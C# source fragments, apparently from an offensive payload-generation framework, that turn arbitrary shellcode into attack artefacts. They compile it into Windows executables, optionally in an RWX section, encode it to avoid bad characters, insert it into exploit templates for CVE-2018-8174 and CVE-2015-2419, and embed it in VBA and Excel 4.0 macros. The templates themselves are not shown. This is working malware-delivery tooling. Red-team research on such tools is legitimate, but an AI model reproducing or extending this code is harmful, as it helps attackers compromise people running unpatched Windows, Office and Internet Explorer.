/// <summary>
/// Produces the two inputs handed to the assembler: a binary file holding
/// <c>shellcode.Bytes</c> and a small assembly stub that exports
/// <paramref name="symbolname"/> and embeds that binary with <c>incbin</c>.
/// </summary>
/// <param name="shellcode">Source of the raw bytes written to the .bin file.</param>
/// <param name="symbolname">Global label placed directly before the embedded bytes.</param>
/// <param name="sectionName">Optional section name; falls back to ".text" when only <paramref name="sectionWritable"/> is given.</param>
/// <param name="sectionWritable">When true, the section is declared "write, execute, read" (an RWX section).</param>
/// <returns>The binary file followed by the assembly stub, in that order.</returns>
private static IEnumerable<AssemblySourceFile<YASM>> CreateSource(IShellcode shellcode, string symbolname, string sectionName = null, bool? sectionWritable = null)
        {
            // Both file names are random 10-character strings from Utils.RandomString.
            var binFileName = Utils.RandomString(10) + ".bin";
            var binFile     = new AssemblySourceFile<YASM>(shellcode.Bytes, binFileName);

            // No SECTION directive is emitted unless the caller supplied a
            // section name or a writability flag.
            var sectionDirective = "";
            if (sectionName != null || sectionWritable.HasValue)
            {
                sectionName      = sectionName ?? ".text";
                sectionDirective = $"SECTION '{sectionName}'";
                if (sectionWritable == true)
                {
                    sectionDirective += " write, execute, read";
                }
                sectionDirective += "\r\n";
            }

            // NOTE(review): symbolname and sectionName are interpolated into the
            // assembler source verbatim. A value containing a quote or a line
            // break would change the generated directives, so callers are
            // expected to pass plain identifiers only.
            var asmText = $"Global {symbolname}\r\n{sectionDirective}{symbolname}:\r\n\tincbin '{binFileName}'";
            var asmFile = new AssemblySourceFile<YASM>(asmText, Utils.RandomString(10) + ".asm");

            return new List<AssemblySourceFile<YASM>> { binFile, asmFile };
        }
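            // Assembles the given shellcode with YASM and links the resulting
            // object file into an Executable whose entry point is the symbol
            // exported by the generated assembly source.
            //
            // shellcode:  bytes to embed.
            // targetArch: selects the Win64 or Win32 object-file pipeline.
            // Throws ArgumentOutOfRangeException (previously a bare Exception with
            // no message) when targetArch is neither x64 nor x86, so the failure
            // names the offending argument and value.
            static Executable ShellcodeToExe(IShellcode shellcode, TargetArch targetArch)
            {
                // Single definition of the exported symbol used by both branches.
                const string entrySymbol = "SheSellsShellCodesByTheSilkRoad";

                switch (targetArch)
                {
                case TargetArch.x64:
                {
                    var rawShellcodeAsm = new RawShellcodeYasmAssemblySource(shellcode, symbolName: entrySymbol);
                    var objectFile      = ((IAssembler <YASM, Win64ObjectFile>) new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm);
                    // The entry point is read back through ICFunction rather than
                    // reusing the constant, as the original code did.
                    var entryPoint      = ((ICFunction)rawShellcodeAsm).Name;
                    var linkerConfig    = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint);
                    var exe             = ((ILinker <Win64ObjectFile, Executable>) new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(objectFile);
                    return exe;
                }

                case TargetArch.x86:
                {
                    var rawShellcodeAsm = new RawShellcodeYasmAssemblySource(shellcode, symbolName: entrySymbol);
                    var objectFile      = ((IAssembler <YASM, Win32ObjectFile>) new MyWarez.Plugins.Yasm.Yasm()).Assemble(rawShellcodeAsm);
                    var entryPoint      = ((ICFunction)rawShellcodeAsm).Name;
                    var linkerConfig    = new MyWarez.Plugins.GoDevTool.Linker.Config(ENTRY: entryPoint);
                    var exe             = ((ILinker <Win32ObjectFile, Executable>) new MyWarez.Plugins.GoDevTool.Linker(linkerConfig)).Link(objectFile);
                    return exe;
                }

                default:
                    throw new ArgumentOutOfRangeException(nameof(targetArch), targetArch, "Only the x64 and x86 target architectures are supported.");
                }
            }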
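        /// <summary>
        /// Encodes <c>shellcode.Bytes</c> through <c>Utils.EncodeShellcode</c>,
        /// passing the shellcode's architecture and the class-level
        /// <c>BadChars</c> set.
        /// </summary>
        /// <param name="shellcode">Shellcode whose architecture must be listed in <c>ValidShellcodeArchs</c>.</param>
        /// <returns>The byte array returned by <c>Utils.EncodeShellcode</c>.</returns>
        /// <exception cref="ArgumentNullException"><paramref name="shellcode"/> is null.</exception>
        /// <exception cref="ArgumentException">The shellcode's architecture is not in <c>ValidShellcodeArchs</c>.</exception>
        private static byte[] EncodeShellcode(IShellcode shellcode)
        {
            // Fail with a named argument instead of a NullReferenceException below.
            if (shellcode == null)
            {
                throw new ArgumentNullException(nameof(shellcode));
            }

            if (!ValidShellcodeArchs.Contains(shellcode.Arch))
            {
                // Same exception type as before, now carrying a message and the
                // parameter name so the rejection can be diagnosed.
                throw new ArgumentException($"Shellcode architecture '{shellcode.Arch}' is not supported by this encoder.", nameof(shellcode));
            }

            return Utils.EncodeShellcode(shellcode.Bytes, shellcode.Arch, BadChars);
        }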
 /// <summary>
 /// Creates the assembly source by delegating file generation to
 /// <c>CreateSource</c> and remembering the exported symbol name.
 /// </summary>
 /// <param name="shellcode">Bytes forwarded to <c>CreateSource</c>.</param>
 /// <param name="symbolName">Exported symbol; also stored in <c>SymbolName</c>.</param>
 /// <param name="sectionName">Optional section name forwarded unchanged.</param>
 /// <param name="sectionWritable">Optional writability flag forwarded unchanged.</param>
 public RawShellcodeYasmAssemblySource(
     IShellcode shellcode,
     string symbolName,
     string sectionName = null,
     bool? sectionWritable = null)
     : base(CreateSource(shellcode, symbolName, sectionName, sectionWritable))
 {
     this.SymbolName = symbolName;
 }
 // Note: payload might execute twice
 /// <summary>
 /// Fills <c>Template</c> with the output of <c>Utils.TransformShellcode</c> and
 /// passes the resulting text to the base constructor. Going by the class name,
 /// the template targets CVE-2018-8174, the Windows VBScript engine flaw that
 /// Microsoft fixed in its May 2018 security updates.
 /// </summary>
 /// <param name="shellcode">Provides the bytes and architecture passed to the transform.</param>
 // "js_le" selects the transform's output format; presumably a little-endian
 // JavaScript encoding (confirm against Utils.TransformShellcode).
 // string.Format treats '{' and '}' in Template as format items, so any literal
 // braces in the template have to be doubled.
 public CVE_2018_8174(IShellcode shellcode) : base(string.Format(Template, Utils.TransformShellcode(shellcode.Bytes, shellcode.Arch, "js_le")))
 {
 }
 /// <summary>
 /// Stores the supplied shellcode in <c>Shellcode</c>; no validation or
 /// transformation is performed here.
 /// </summary>
 /// <param name="shellcode">Value assigned to <c>Shellcode</c> as-is (null is not rejected).</param>
 public ShellcodeVbaMacro(IShellcode shellcode)
 {
     this.Shellcode = shellcode;
 }
 // Note: payload might fire twice
 // IE Exploit (CVE-2015-2419)
 /// <summary>
 /// Fills <c>Template</c> with the shellcode bytes rendered by
 /// <c>Utils.BytesToJavaScriptArray</c> and passes the resulting text to the
 /// base constructor. CVE-2015-2419 is the Internet Explorer JScript9
 /// memory-corruption flaw addressed by Microsoft bulletin MS15-065 (July 2015).
 /// </summary>
 /// <param name="shellcode">Provides the bytes; the architecture is not consulted here.</param>
 // string.Format treats '{' and '}' in Template as format items, so any literal
 // braces in the template have to be doubled.
 public CVE_2015_2419(IShellcode shellcode) : base(string.Format(Template, Utils.BytesToJavaScriptArray(shellcode.Bytes)))
 {
 }
 /// <summary>
 /// Runs the shellcode through <c>EncodeShellcode</c>, converts the encoded
 /// bytes with <c>ShellCodeToCellMatrix</c>, and passes the result to the base
 /// constructor with <c>macroEnabled: true</c>.
 /// </summary>
 /// <param name="shellcode">Shellcode to encode.</param>
 // NOTE(review): any exception thrown by EncodeShellcode propagates out of
 // this constructor, because it runs inside the base-constructor argument.
 public ShellcodeXlmMacro(IShellcode shellcode) : base(ShellCodeToCellMatrix(EncodeShellcode(shellcode)), macroEnabled: true)
 {
 }